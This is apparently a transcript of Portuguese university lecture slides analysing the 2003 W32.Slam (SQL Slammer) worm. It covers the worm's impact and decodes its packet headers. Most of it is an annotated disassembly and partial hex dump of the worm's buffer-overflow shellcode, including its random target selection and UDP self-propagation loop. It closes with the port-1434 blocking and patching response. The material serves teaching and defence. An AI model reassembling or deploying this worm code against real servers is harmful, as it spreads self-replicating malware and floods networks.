Criptografia e Segurança das Comunicações. das Comunicações

Transcrição

1 Curiosidade, não faz parte da avaliação Criptografia e Segurança das Comunicações Análise do verme W32.Slam W32.Slam: 1/21 Introdução (1) O conceito de verme foi divulgado em Em 1988 foi lançado o Morris, o primeiro verme com grande impacto. A 25 janeiro de 2003 foi lançado o verme W32.Slam, também conhecido por Sapphire ou Slammer. Espalhou-se muito rapidamente por usar protocolo de transporte UDP. Registados enormes prejuízos 5 servidores DNS de topo bloqueados. Placa giratória da Continental Airlines em Newark/NJ teve de ser encerrada. Rede ATM do Bank of America com graves disrupções. Telemóveis da Coreia do Sul tornados inoperacionais. Ataque baseado na transposição da memória tampão, uma fraqueza do SQL Server. W32.Slam: 2/21

2 Introdução (2) Pacote ocupa apenas 404B. Cabeçalho IP Cabeçalho UDP cf e630 c0a c0a8 016a 049f 059a 0180 ac8d dc c9b0 42eb 0e ae ae dcc9 b042 b c9b e2fd e e64 6c6c c b65 726e f75 6e b b9 6c6c e f66 b f63 6b66 b974 6f e 64be 1810 ae42 8d45 d450 ff16 508d 45e0 508d 45f0 50ff 1650 be10 10ae 428b 1e8b 033d 558b ec be1c 10ae 42ff 16ff d031 c f b 81f d 45cc 508b 45c0 50ff 166a 116a 026a 02ff d050 8d45 c450 8b45 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d 0c40 8d14 88c1 e204 01c2 c1e c28d d b46a 108d 45b c f d b45 50ff d6eb ca Código W32.Slam: 3/21 Cabeçalhos IP/UDP (1) A. Cabeçalho IP Campo Valor Significado Versão (4-IP), IHL (5), Tipo Serviço (0) Comprimento do datagrama 3 cf09 Identificação Bandeiras, offset TTL, Protocolo transporte (11-UDP) 6 e630 Checksum do cabeçalho 7 c0a80164 Endereço IP fonte 8 c0a8016a Endereço IP destino W32.Slam: 4/21

3 Cabeçalhos IP/UDP (2) B. Cabeçalho UDP Campo Valor Significado 1 049f Porto fonte 2 095a Porto destino (1434d - SQL server) Comprimento cabeçalho + dados (384B) 4 ac8d Checksum W32.Slam: 5/21 Código (1) Numa interrogação ao servidor SQL, envia-se 1. Código de interrogação Byte 0x04 2. Identificador da base de dados a interrogar, até 128B que deve ser terminada por 0x00. O W32.Slam não contém 0x00 por forma a transpor ( overflow ) a memória tampão. Depois do 0x04 são colocados 0x01 em número suficiente para acomodar o código do verme e alterar endereço de retorno da rotina do servidor SQL para o código do verme. Entre os 0x01 encontram-se dados inseridos por instruções executadas pelo código do verme. W32.Slam: 6/21

4 Código (2) O programa corre apenas em cima do Windows 32 com servidor SQL. Rotinas da API socket acedidas por bibliotecas dinâmicas (endereços nas tabela IAT). O programa é dividido em quatro etapas: 1. Reconstrução da memória tampão, designadamente para eliminar eventuais 0x00, para poder ser enviada em novo ataque. 2. Recolha de parâmetros para a pilha. 3. Abre um socket e tempo desde arranque do SO. 4. Ciclo infinito 1. Selecciona aleatoriamente endereço IP para novo alvo do ataque. 2. Replica pacote UDP. W32.Slam: 7/21 Código (2) C. Passo 1: Reconstruir buffer, para que possa ser enviado mais tarde no passo 4.2-ciclo sendto() 68DCC9B042 push 0x42b0c9dc ; insere 01h 96 vezes na pilha B mov eax,0x ; 31C9 xor ecx,ecx ; B118 mov cl,0x18 ; FIXUP_PAYLOAD: ; E2FD loop FIXUP_PAYLOAD ; Não pode usar MOV ecx,... porque código não pode conter 00 s! W32.Slam: 8/21

5 Código (3) Passo 2: Carregar parâmetros na pilha ; insere 04h na pilha (código de interrogação ao SQL server) ; 0x xor 0x = 0x xor eax,0x ; Não pode usar MOV eax,... porque código não pode conter 00 s! ; copia ESP para EBP, por forma a poder aceder aos dados inseridos na pilha 89E5 mov ebp,esp ; ; insere string kernel32.dll na pilha ECX ficou com 0 no loop 682E646C6C push dword '.dll' ; 68656C3332 push dword 'el23' ; 686B65726E push dword 'kern' ; W32.Slam: 9/21 Código (4) ; insere string GetTickCount na pilha 686F756E74 push dword 'ount' ; B43 push dword 'ickc' ; push dword 'GetT' ; ; insere string ws2_32.dll na pilha 66B96C6C mov cx, 'll' ; ECX superior continua com E64 push dword '32.d' ; F push dword 'ws2_' ; ; insere string socket na pilha 66B96574 mov cx, 'et' ; ECX superior continua com F636B push dword 'sock' ; W32.Slam: 10/21

6 Código (5) ; insere string sendto na pilha 66B9746F mov cx, 'to' ; ECX superior continua com E64 push dword 'send' ; ; call sqlsort:[iat]->loadlibrary("ws2_32.dll") BE1810AE42 mov esi, 42AE1018h ; endereço da sqlsort.dll na IAT 8D45D4 lea eax,[ebp-0x2c] ; endereço parâmetro "ws2_32.dll" FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de ws2_32) W32.Slam: 11/21 Código (6) ; call sqlsort:[iat]->loadlibrary("kernel32.dll") 8D45E0 lea eax,[ebp-0x20] ; endereço parâmetro GetTickCount 8D45F0 lea eax,[ebp-0x10] ; endereço parâmetro kernel32.dll FF16 call dword ptr [esi] ; no EAX está retorno de LoadLibrary ; (base de kernel 32) ; Procura entrada GetProcAddress na IAT (Import Address Table), que roda nas ; versões dll, comparando a assinatura dos primeiros 4Bytes. BE1010AE42 mov esi, 42AE1010h ; endereço base da IAT 8B1E mov ebx,[esi] ; ebx<- entrada IAT 8B03 mov eax,[ebx] ; eax<-4b de instruções 3D558BEC51 cmp eax,0x51ec8b55 ; assinatura de GetProcAddress? 7405 jz FOUND_IT ; BE1C10AE42 mov esi,0x42ae101c ; entrada IAT passa a GetProcAddress W32.Slam: 12/21

7 Código (7) Passo 3: Abrir socket e recolher tempo desde arranque do SO. FOUND_IT: ; GetProcAddress(kernel32_base,GetTickCount) FF16 call dword ptr [esi] ; ; GetTickCount() FFD0 call eax ; no EAX estão milisegundos ; desde o início sistema (para ; semente do gerador aleatório) ; carrega parâmetros para a pilha 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! salva semente W32.Slam: 13/21 Código (8) 81F B xor ecx,0x9b ; 0x9B xor 0x = 81F xor ecx,0x9b ; 0x9A ; (port=1234/ family=af_inet) ; GetProcAddress(ws2_32,socket) Não pode usar MOV ecx,... porque código não pode conter 00 s! 8D45CC lea eax,[ebp-0x34] ; endereço parâmetro socket 8B45C0 mov eax,[ebp-0x34] ; endereço base ws2_32 FF16 call dword ptr [esi] ; W32.Slam: 14/21

8 Código (9) ; socket(af_inet, SOCK_DGRAM,IPPROTO_UDP) 6A11 push 0x11h ; 6A02 push 0x02h ; 6A02 push 0x02h ; FFD0 call eax ; ; GetProcAddress(ws2_32,sendto) 8D45C4 lea eax,[ebp-0x3c] ; endereço parâmetro sendto 8B45C0 mov eax,[ebp-0x40] ; endereço base de ws2_32 FF16 call dword ptr [esi] ; 89C6 mov esi,eax ; W32.Slam: 15/21 Código (10) Passo 4.1: Seleccionar aleatoriamente um endereço IP Autor tentou usar o gerador congruente linear X n+1 = (214013X n ) mod 2 32 Na implementação cometeu 2 lapsos: Limpeza de ebx feita com OR, quando deve ser feita com XOR. Resultado: o sal é 0x ou 0x ! Incremento codificado por 0xffd9613c, equivalente a : a negação é complemento para 2, faltou adicionar 1! Usou instrução ADD, quando devia usar SUB por causa do valor negativo! Resultado: o incremento é sempre par! W32.Slam: 16/21

9 Código (11) 09DB or ebx,ebx ; 81F33C61D9FF xor ebx,0xffd9613c ; ebx<-0x ou 0x ; conforme versão dll PSEUDO_RAND_SEND: 8B45B4 mov eax,[ebp-0x4c] ; carrega semente ; determina novo endereço IP 8D0C40 lea ecx,[eax+eax*2] ; 8D1488 lea edx,[eax+ecx*4] ; C1E204 shl edx,0x4 ; 01C2 add edx,eax ; C1E208 shl edx,0x8 ; 29C2 sub edx,eax ; 8D0490 lea eax,[eax+edx*4] ; 01D8 add eax,ebx ; 8945B4 mov [ebp-0x4c],eax ; guarda novo endereço IP na ; estrutura sock_addr W32.Slam: 17/21 Código (12) Passo 4.2: Enviar pacote UDP ; sendto(sock,payload,376,0,sock_addr struct,16) 6A10 push 0x10h ; 8D45B0 lea eax,[ebp-0x50] ; carrega endereço sock_addr 31C9 xor ecx,ecx ; ecx<-0 Não pode usar MOV ecx,0 porque código não pode conter 00 s! 6681F17801 xor cx,0x178 ; comprimento carga = 376B 8D4503 lea eax,[ebp+0x3] ; endereço da carga 8B45AC mov eax,[ebp-0x54] ; FFD6 call esi ; ; fecha ciclo EBCA jmp PSEUDO_RAND_SEND W32.Slam: 18/21

10 Trafego gerado Devido ao ciclo curto e transporte pelo protocolo UDP, o trafego cresceu exponencialmente limitado apenas pela capacidade da rede. América do Norte 12:45 EST Asia Europa W32.Slam: 19/21 Combate (1) O W32.Slam foi rapidamente detectado pelo enorme incremento de tráfego. A inspecção do cabeçalho UDP permitiu identificar ao fim de 1 hora o porto de transmissão, tendo os supervidores da rede contactado administradores para fechar a porta. Depois todos os administradores instalaram o patch da Microsoft, que tinham sido previamente publicitado. Os restantes portos mantiveram-se operacionais sendo os serviços afectados apenas pela saturação de tráfego por parte dos pacotes UDP do W32.Slam. W32.Slam: 20/21

11 Combate (2) MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434! From: Michael Bacarella <mbac () netgraft com> Date: Sat, 25 Jan :11: I'm getting massive packet loss to various points on the globe. I am seeing a lot of these in my tcpdump output on each host. 02:06: > ms-sql-m: udp :06: > : icmp: udp port ms-sql-m unreachable [tos0xc0 It looks like there's a worm affecting MS SQL Server which is pingflooding addresses at some random sequence. All admins with access to routers should block port 1434 (ms-sql-m)! Everyone running MS SQL Server shut it the hell down or make sure it can't access the internet proper! I make no guarantees that this information is correct, test it out for yourself! -- Michael Bacarella 24/7 phone: Netgraft Corporation "unique technologies to empower your business" W32.Slam: 21/21